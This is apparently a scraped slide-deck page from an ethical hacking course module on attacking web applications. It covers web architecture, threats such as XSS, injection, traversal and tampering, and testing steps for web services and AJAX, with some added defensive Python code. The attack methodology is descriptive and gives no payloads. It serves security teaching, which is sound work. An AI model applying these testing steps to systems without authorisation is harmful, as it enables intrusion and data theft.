Slide: Web Services Testing. The flow diagram lists the tests (gather WS information, test WSDL, XML structural, XML content-level, HTTP GET parameters/REST, naughty SOAP attachments, replay testing) and what they yield: SOAP message information, HTTP GET/REST attack vectors, information about SQL, XPath, buffer overflow and command injection vulnerabilities, and information about MITM vulnerability.
Web Services Testing
Step 1: Gather WS information
Gather WS information using tools such as Net Square wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods.
Step 2: Test WSDL
Test WSDL to determine the various entry points it exposes. You can automate web services security testing using tools such as WSDigger, WebScarab, and Foundstone.
Step 3: Test XML structural
Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing.
Step 4: Test XML content-level
Use web application vulnerability scanners such as WebScarab to test XML content-level vulnerabilities.
Step 5: Test HTTP GET parameters/REST
Pass malicious content on the HTTP GET strings that invoke XML applications.
Step 6: Test naughty SOAP attachments
Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment to check if the XML document has a SOAP attachment vulnerability.
Step 7: Perform replay testing
Attempt to resend a sniffed XML message using Wireshark and WebScarab. This test gives information about MITM vulnerability.
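As an added example (not part of the CEH course material), the following Python shows the admission controls that step 3 and step 7 probe for on a SOAP endpoint: the message size is checked before parsing, the envelope must be well-formed and carry a MessageID and timestamp, a stale timestamp is refused, and a MessageID seen before within the freshness window is rejected as a replay. The size limit, window and the application timestamp element are assumptions constructed for the illustration (WS-Security defines its own timestamp and nonce elements; the logic is the same).

```python
import xml.etree.ElementTree as ET

MAX_MESSAGE_BYTES = 64 * 1024    # constructed limit; checked before any parsing happens
FRESHNESS_SECONDS = 300          # how long a timestamp is accepted and a MessageID remembered
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WSA_NS = "http://www.w3.org/2005/08/addressing"
APP_NS = "urn:example:replay"    # assumed application namespace for the timestamp element


def build_message(msg_id, sent_at, body_xml):
    """Constructed client side: a SOAP 1.1 envelope with a WS-Addressing
    MessageID and an application timestamp (seconds since the epoch)."""
    return (
        '<soap:Envelope xmlns:soap="%s" xmlns:wsa="%s" xmlns:app="%s">'
        "<soap:Header><wsa:MessageID>%s</wsa:MessageID>"
        "<app:Timestamp>%s</app:Timestamp></soap:Header>"
        "<soap:Body>%s</soap:Body></soap:Envelope>"
        % (SOAP_NS, WSA_NS, APP_NS, msg_id, sent_at, body_xml)
    ).encode()


class SoapGate:
    """Server-side admission check run before a message reaches any handler."""

    def __init__(self, now):
        self._now = now      # injectable clock
        self._seen = {}      # MessageID -> time it was first accepted

    def accept(self, raw_bytes):
        """Return (accepted, reason). The reason names the failing check, so a
        test run can tell an oversize rejection from a replay rejection."""
        if len(raw_bytes) > MAX_MESSAGE_BYTES:
            return False, "oversize"
        try:
            # For untrusted XML in production prefer the defusedxml parser, which
            # also blocks entity-expansion and external-entity tricks.
            root = ET.fromstring(raw_bytes)
        except ET.ParseError:
            return False, "malformed"
        if root.tag != "{%s}Envelope" % SOAP_NS:
            return False, "not a SOAP envelope"
        header = root.find("{%s}Header" % SOAP_NS)
        if header is None:
            return False, "missing header"
        msg_id = header.findtext("{%s}MessageID" % WSA_NS)
        try:
            sent_at = float(header.findtext("{%s}Timestamp" % APP_NS))
        except (TypeError, ValueError):
            return False, "missing or invalid timestamp"
        now = self._now()
        if abs(now - sent_at) > FRESHNESS_SECONDS:
            return False, "stale"
        if not msg_id:
            return False, "missing MessageID"
        # Forget ids older than the window, so the cache itself cannot be grown without bound.
        self._seen = {k: t for k, t in self._seen.items() if now - t <= FRESHNESS_SECONDS}
        if msg_id in self._seen:
            return False, "replay"
        self._seen[msg_id] = now
        return True, "ok"
```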
Slide: AJAX Testing. The flow diagram maps the test for AJAX to application call endpoints, parsing the HTML and JavaScript files to the XMLHttpRequest object, JavaScript files and AJAX frameworks, and using a proxy to observe traffic to the format of application requests.
AJAX Testing
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the
background asynchronous traffic to the AJAX endpoints in order to determine the format and
destination of the requests.
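As an added example (not part of the CEH course material), the following Python is a defender's version of step 2: it extracts the endpoints referenced from shipped JavaScript and compares them with the documented API inventory, so undocumented surface is found during review rather than by an outside tester. The call forms recognised are a small set of common ones, and the sample script files are constructed for the illustration.

```python
import re

# Call forms recognised (a few common ones; frameworks add more of their own):
#   fetch("/api/x")            xhr.open("GET", "/api/x")
#   $.get("/api/x")            $.ajax({ url: "/api/x", ... })
CALL_PATTERNS = [
    re.compile(r"""\bfetch\(\s*['"]([^'"]+)['"]"""),
    re.compile(r"""\.open\(\s*['"][A-Za-z]+['"]\s*,\s*['"]([^'"]+)['"]"""),
    re.compile(r"""\$\.(?:get|post|getJSON)\(\s*['"]([^'"]+)['"]"""),
    re.compile(r"""\burl\s*:\s*['"]([^'"]+)['"]"""),
]

# Constructed sample of two shipped script files.
SAMPLE_JS = {
    "app.js": (
        'fetch("/api/v1/profile").then(r => r.json());\n'
        "const xhr = new XMLHttpRequest();\n"
        'xhr.open("POST", "/api/v1/orders", true);\n'
    ),
    "admin.js": (
        '$.ajax({ url: "/api/v1/admin/users", type: "GET" });\n'
        "$.post('/api/v1/export', payload);\n"
    ),
}


def enumerate_endpoints(js_sources):
    """js_sources: {filename: text}. Returns {url: [files that reference it]}."""
    found = {}
    for filename, text in js_sources.items():
        for pattern in CALL_PATTERNS:
            for match in pattern.finditer(text):
                found.setdefault(match.group(1), set()).add(filename)
    return {url: sorted(files) for url, files in found.items()}


def undocumented_endpoints(found, documented):
    """Endpoints the client code calls that are absent from the documented API
    inventory: the first place to look for forgotten, unauthenticated or
    admin-only calls that never went through review."""
    return sorted(url for url in found if url not in documented)
```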
Module Summary
Organizations today rely heavily on web applications and Web 2.0 technologies to support key business processes and improve performance.
With increasing dependence, web applications and web services are increasingly being targeted by various attacks that result in huge revenue loss for the organizations.
Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc.
Input validation flaws are a major concern as attackers can exploit these flaws to perform or create a base for most of the web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc.
It is also observed that most of the vulnerabilities result because of misconfiguration and not following standard security practices.
Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using WAF firewall/IDS, and performing regular auditing of the network using web application security tools.

PPTX
United States Clean Coal Technologies Market Growth, Demand and Challenges of...
PDF
Project Presentation-----------------.pdf
PPTX
Aircraft Cabin Interior Market Growth, Demand and Challenges of the Key Indus...
PPTX
United States Solar Power Market Growth, Demand and Challenges of the Key Ind...
PPTX
United States Dental Imaging Market Growth, Demand and Challenges of the Key ...
PPTX
United States Sepsis Diagnostics Market by Product Type, Distribution Channel...
PPTX
United States Construction Equipment Rental Market Growth, Demand and Challen...
PPTX
United States Semiconductor Manufacturing Equipment Market by Product Type, D...
PPTX
Ceramic Matrix Composites Market Growth, Demand and Challenges of the Key Ind...
PPTX
United States Chronic Disease Management Market by Product Type, Distribution...
PPTX
United States Workforce Management Market by Product Type, Distribution Chann...
PPTX
United States Pen Needles Market PPT: Growth, Outlook, Demand, Keyplayer Anal...
PPTX
United States Hemostats Market Growth, Demand and Challenges of the Key Indus...
PDF
Analysis of Regional Phishing Attack
United States Green Technology and Sustainability Market Growth, Demand and C...
United States Fraud Detection and Prevention Market Growth, Demand and Challe...
Keynote - Jagdish Mitra - Democratizing AI - H2O AI World London 2018
United States Sports Technology Market PPT: Growth, Outlook, Demand, Keyplaye...
The evolution of the internet
Voice Communication Control System Market by Product Type, Distribution Chann...
United States Clean Coal Technologies Market Growth, Demand and Challenges of...
Project Presentation-----------------.pdf
Aircraft Cabin Interior Market Growth, Demand and Challenges of the Key Indus...
United States Solar Power Market Growth, Demand and Challenges of the Key Ind...
United States Dental Imaging Market Growth, Demand and Challenges of the Key ...
United States Sepsis Diagnostics Market by Product Type, Distribution Channel...
United States Construction Equipment Rental Market Growth, Demand and Challen...
United States Semiconductor Manufacturing Equipment Market by Product Type, D...
Ceramic Matrix Composites Market Growth, Demand and Challenges of the Key Ind...
United States Chronic Disease Management Market by Product Type, Distribution...
United States Workforce Management Market by Product Type, Distribution Chann...
United States Pen Needles Market PPT: Growth, Outlook, Demand, Keyplayer Anal...
United States Hemostats Market Growth, Demand and Challenges of the Key Indus...
Analysis of Regional Phishing Attack

Recently uploaded (20)

PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Spectral efficient network and resource selection model in 5G networks
PPTX
Big Data Technologies - Introduction.pptx
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PPT
Teaching material agriculture food technology
DOCX
The AUB Centre for AI in Media Proposal.docx
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PDF
cuic standard and advanced reporting.pdf
PPTX
A Presentation on Artificial Intelligence
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
Per capita expenditure prediction using model stacking based on satellite ima...
Encapsulation_ Review paper, used for researhc scholars
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Spectral efficient network and resource selection model in 5G networks
Big Data Technologies - Introduction.pptx
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Reach Out and Touch Someone: Haptics and Empathic Computing
Building Integrated photovoltaic BIPV_UPV.pdf
NewMind AI Weekly Chronicles - August'25-Week II
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Digital-Transformation-Roadmap-for-Companies.pptx
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Teaching material agriculture food technology
The AUB Centre for AI in Media Proposal.docx
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Mobile App Security Testing_ A Comprehensive Guide.pdf
cuic standard and advanced reporting.pdf
A Presentation on Artificial Intelligence
“AI and Expert System Decision Support & Business Intelligence Systems”

Hacking web applications CEHv8 module 13

  • 2. Exam 312-50 Certified Ethical Hacker. Ethical Hacking and Countermeasures: Hacking Web Applications. Hacking Web Applications, Module 13. Engineered by Hackers. Presented by Professionals. CEH Ethical Hacking and Countermeasures v8, Module 13: Hacking Web Applications, Exam 312-50. Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited. Module 13 Page 1724
  • 3. Security News: XSS Attacks Lead Pack As Most Frequent Attack Type. Source: http://www.darkreading.com. Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole. Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).
One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks; in particular, XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose
  • 4. 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517. Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details, without the site or user's knowledge. The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site, and this ranges from personal data found on social networking sites to the financial and confidential details entered on ecommerce sites, amongst others. A great number of organisations have fallen victim to such attacks in recent years, including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore, in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.
"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP, a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature, the consequences of which can be significant in terms of both financial and reputational damage." The Superfecta attack traffic for Q3 2012 can be broken down as follows: As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has, however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%) to become the second most likely origin of malicious traffic.
Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last: During the build-up to the holiday season, ecommerce activity ramps up dramatically, and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost, explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of
  • 5. confidential data at risk, including customers' financial information (credit card and debit card details), there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks." Copyright © 2013 UBM Tech, All rights reserved. http://www.darkreading.com/security/news/240009508/firehost-q3-web-application-report-xss-attacks-lead-pack-as-most-frequent-attack-type.html
  • 6. Module Objectives (CEH): How Web Applications Work; Web Attack Vectors; Web Application Threats; Web App Hacking Methodology; Footprint Web Infrastructure; Hacking Web Servers; Analyze Web Applications; Attack Authentication Mechanism; Attack Authorization Schemes; Session Management Attack; Attack Data Connectivity; Attack Web App Client; Attack Web Services; Web Application Hacking Tools; Countermeasures; Web Application Security Tools; Web Application Firewall; Web Application Pen Testing. Module Objectives: The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrators monitor and manage web applications are described. Finally, web application pen testing is discussed. This module familiarizes you with:
  • 7. How Web Applications Work; Web Attack Vectors; Web Application Threats; Web App Hacking Methodology; Footprint Web Infrastructure; Hacking Web Servers; Analyze Web Applications; Attack Authentication Mechanism; Attack Authorization Schemes; Session Management Attack; Attack Data Connectivity; Attack Web App Client; Attack Web Services; Web Application Hacking Tools; Countermeasures; Web Application Security Tools; Web Application Firewall; Web Application Pen Testing.
  • 8. Module Flow: Web applications are application programs that are accessed only over an Internet connection. These applications use HTTP as their primary communication protocol. Generally, attackers target these apps for several reasons, and they are exposed to various attacks. For a clear understanding of hacking web applications, we have divided the concept into various sections: Web App Concepts; Web App Threats; Hacking Methodology; Web Application Hacking Tools; Countermeasures; Security Tools; Web App Pen Testing. Let us begin with the Web App concepts.
  • 9. [Module flow diagram: Web App Concepts; Web App Threats; Hacking Methodology; Web Application Hacking Tools; Countermeasures; Security Tools; Web App Pen Testing.] This section introduces you to the web application and its components, explains how the web application works, and describes its architecture. It provides insight into Web 2.0 applications, vulnerability stacks, and web attack vectors.
  • 10. Web Application Security Statistics (CEH). Source: https://www.whitehatsec.com. According to the WhiteHat Security website statistics report of 2012, it is clear that cross-site scripting vulnerabilities are found on more web applications than any other class of vulnerability. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities are the most common, found in 55% of web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
  • 11. [Figure: bar chart of vulnerability classes found in web applications: Cross-Site Scripting, Information Leakage, Content Spoofing (16%), Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection (10%), Session Fixation, Insufficient Session Expiration.] FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012
  • 12. Introduction to Web Applications (CEH). Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and to improve business efficiency. Introduction to Web Applications: Web applications are applications that run on a remote web server and send their output over the Internet. Web 2.0 technologies are used by all web-server-based applications for communication with users, clients, third-party users, etc. A web application is comprised of many layers of functionality; however, it is generally considered a three-layered architecture consisting of presentation, logic, and data layers. The web architecture relies substantially on the technology popularized by the World Wide Web: Hypertext Markup Language (HTML) and the primary transport medium, i.e. Hypertext Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client.
Typically, it operates over TCP port 80, but it may also communicate over another, otherwise unused port. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Some of the popular web servers present today are Microsoft IIS, the Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun ONE. Resources are identified by Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content. Since HTTP is stateless, i.e., the protocol does not maintain session state,
  • 13. the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client. Cookies can be used as tokens, which servers hand over to clients to allow access to websites, so that users do not have to request a token for each query. However, cookies are not perfect from a security point of view, because they can be copied and stored on the client's local hard disk. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers use the different types of vulnerabilities that can be discovered in web applications and exploit them to compromise those applications. Attackers also use tools to launch attacks on web applications.
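The "cookie as token" mechanism the passage describes, as an added example that is not code from the CEH module: the server mints a random token after login, binds it server-side to a user and an expiry, and refuses tokens that are unknown, expired or logged out; the class and function names, the 15-minute lifetime and the injectable clock are this example's own choices.

```python
"""Session tokens over stateless HTTP.

Added example, not code from the CEH module: the server hands the client a
random token after login (the "cookie as token" the module describes), binds
it to a user and an expiry time, and rejects tokens that are unknown, expired
or logged out. The class and function names, the 15-minute lifetime and the
injectable clock are this example's own choices.
"""
import secrets
import time

SESSION_LIFETIME = 15 * 60  # seconds; constructed value for this example


class SessionStore:
    """Server-side session table: token -> {user, expires}."""

    def __init__(self, clock=time.time):
        self._clock = clock        # injectable so expiry can be tested
        self._sessions = {}

    def issue(self, user):
        """After a successful login: mint an unguessable 256-bit token."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {
            "user": user,
            "expires": self._clock() + SESSION_LIFETIME,
        }
        return token

    def validate(self, token):
        """Return the user bound to token, or None if it must be refused.

        An unknown token (never issued, or revoked) and an expired one are
        treated alike; the expired entry is dropped so the table does not
        keep stale sessions alive ("insufficient session expiration").
        """
        entry = self._sessions.get(token)
        if entry is None:
            return None
        if self._clock() >= entry["expires"]:
            del self._sessions[token]
            return None
        return entry["user"]

    def revoke(self, token):
        """Logout: the token stops working even if the cookie survives."""
        self._sessions.pop(token, None)


def set_cookie_header(token):
    """Cookie attributes that limit what a copied cookie is worth:
    HttpOnly keeps page script (XSS) from reading it, Secure keeps it off
    plaintext HTTP, SameSite=Strict keeps cross-site requests (CSRF) from
    sending it, and Max-Age mirrors the server-side lifetime."""
    return ("Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Strict; "
            "Max-Age=%d" % (token, SESSION_LIFETIME))


if __name__ == "__main__":
    store = SessionStore()
    tok = store.issue("alice")
    print(set_cookie_header(tok))
    print("valid ->", store.validate(tok))
    store.revoke(tok)
    print("after logout ->", store.validate(tok))
```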
  • 14. Web Application Components (CEH). The components of web applications are listed as follows. Login: Most websites allow authentic users to access the application by means of a login. It means that to access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com. The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server. Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information. User Permissions: When you are not allowed to access the specified web page to which you are logged in with user permissions, you may be redirected again to the login page or to any other page. The Application Content: It is an interactive program that accepts web requests from clients and uses the parameters that are sent by the web browser for carrying out certain functions. Data Access: Usually the web pages will contact each other via a data access library in which all the database details are stored.
  • 15. The Data Store: It is the way to the important data that is shared and synchronized between child threads. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network; they can be in contact with or accessible to each other through the network connection. Role-level System Security. Application Logic: Usually web applications are divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and gives it services accordingly. The services offered by the application logic include querying and updating the database as well as generating a user interface. Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either on the initiative of the application logic or automatically when the servlet session times out.
  • 16. How Web Applications Work (CEH). [Slide diagram: the application server runs SELECT * from news where id=6329; output: ID 6329, Topic Tech, News CNN.] How Web Applications Work: Whenever someone clicks or types in the browser, the requested website or content is immediately displayed on the screen of the computer, but what is the mechanism behind this? This is the step-by-step process that takes place once a user sends a request for particular content or a website, where multiple computers are involved. The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynamic content generation technology tools, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information. Let's see how the user triggers the initial request through the browser to the web application server: First, the user types the website name or URL in the browser and the request is sent to the web server. On receiving the request, the web server checks the file extension: If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
• 17.   - If the user requests a web page with the extension CFM, CFML, or CFC, then the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server. The user's request is now processed by the web application server. In order to process the user's request, the web server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored in the database. Once done processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.
FIGURE 13.2: Working of Web Application (figure components: User, Login Form, Internet, Firewall, Web Server)
• 18. Web Application Architecture
All web applications execute with the help of the web browser as a support client. Web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented using the client-side script, while the heavier tasks such as storing and gathering required data are handled by the server-side script. In the following architecture, clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. Data access is handled by the database layer using cloud services and a database server.
• 19. FIGURE 13.3: Web Application Architecture (figure layers: Clients: web browser, smart phones, web appliance, external web services; Presentation Layer: Flash, Silverlight, JavaScript, proxy server, cache, web server, firewall, HTTP request parser, servlet container, resource handler, authentication and login; Business Layer: application server, business logic, J2EE, .NET, COM, XCode, C++, COM+, legacy application, data access; Database Layer: cloud services, database server)
• 20. Web 2.0 Applications
Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration.
It offers various features such as:
- Advanced gaming
- Dynamic as opposed to static site content
- RSS-generated syndication
- Social networking sites (Flickr, Facebook, del.icio.us)
- Mash-ups (emails, IMs, electronic payment systems)
- Wikis and other collaborative applications
- Google Base and other free web services (Google Maps)
- Ease of data creation, modification, or deletion by individual users
- Online office software (Google Docs and Microsoft Light)
- Interactive encyclopedias and dictionaries
- Cloud computing websites such as Amazon.com
• 21. - Frameworks (Yahoo! UI Library, jQuery)
- Flash-rich interface websites
- Mobile application (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)
• 22. Vulnerability Stack
Web applications are maintained and accessed through various levels that include: custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each level help the user in one way or another to access the web application securely. When talking about web applications, security is a critical component to be considered because web applications are a major source of attacks. The following vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that makes the web applications vulnerable:
• 23. FIGURE 13.4: Vulnerability Stack (layers, top to bottom: Custom Web Applications: business logic flaws, technical vulnerabilities; Third Party Components: open source / commercial; Database: Oracle / MySQL / MS SQL; Web Server: Apache / Microsoft IIS; Operating System: Windows / Linux / OS X; Network: router / switch; Security: IPS / IDS)
• 24. Web Attack Vectors
An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome. Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting. Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack.
An attack vector is a method of entering unauthorized systems to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors:
- Parameter manipulation: The attacker provides wrong input values to the web services and gains control over the SQL, LDAP, XPATH, and shell commands. When incorrect values are provided to the web services, they become vulnerable and are easily attacked through web applications running with web services.
- XML poisoning: Attackers provide manipulated XML documents that, when executed, can disturb the logic of the parsing method on the server. When huge XML documents are executed at the application layer, they can easily be compromised by the attacker to launch his or her attack and gather information.
- Client validation: Most client-side validation has to be supported by server-side authentication. AJAX routines can be easily manipulated, which in turn makes a way for attackers to carry out SQL injection, LDAP injection, etc. and compromise the web application's key resources.
• 25. - Server misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.
- Web service routing issues: SOAP messages are permitted to access different nodes on the Internet by WS-Routers. Exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints.
- Cross-site scripting: Whenever any infected JavaScript code is executed, the targeted browsers can be exploited by the attacker to gather information.
• 26. Module Flow
Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code as it relates to security is poor, and another issue is an application with a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.
Module flow: Web App Concepts; Web App Threats; Hacking Methodology; Web Application Hacking Tools; Countermeasures; Security Tools; Web App Pen Testing.
• 27. This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
• 28. Web Application Threats - 1
Web application threats are not limited to attacks based on URL and port 80. Despite using ports, protocols, and the OSI layer, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack. The various types of web application threats are as follows:
Cookie Poisoning: By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for a malicious attack, or steal information from the user's system.
Directory Traversal: Attackers exploit HTTP by using directory traversal to access restricted directories and execute commands outside of the web server's root directory.
Unvalidated Input: In order to bypass the security system, attackers tamper with the HTTP requests, URL, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related
• 29. data gets stored in the cookies and this becomes a source of attack for intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.
Cross-site Scripting (XSS): An attacker bypasses the client's ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.
Injection Flaws: Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.
SQL Injection: This is a type of attack where SQL commands are injected by the attacker via input data; then the attacker can tamper with the data.
Parameter/Form Tampering: This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man in the middle is one of the examples of this type of attack. Attackers use tools like WebScarab and Paros Proxy for these attacks.
Denial-of-Service (DoS): A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.
Broken Access Control: Broken access control is a method used by attackers where a particular flaw has been identified related to the access control, where authentication is bypassed and the attacker compromises the network.
Cross-site Request Forgery: The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses. For example, a user clicking on a particular link sent through an email or chat.
Information Leakage: Information leakage can cause great losses for a company. Hence, all sources such as
• 30. systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.
Improper Error Handling: It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.
Log Tampering: Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.
Buffer Overflow: A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.
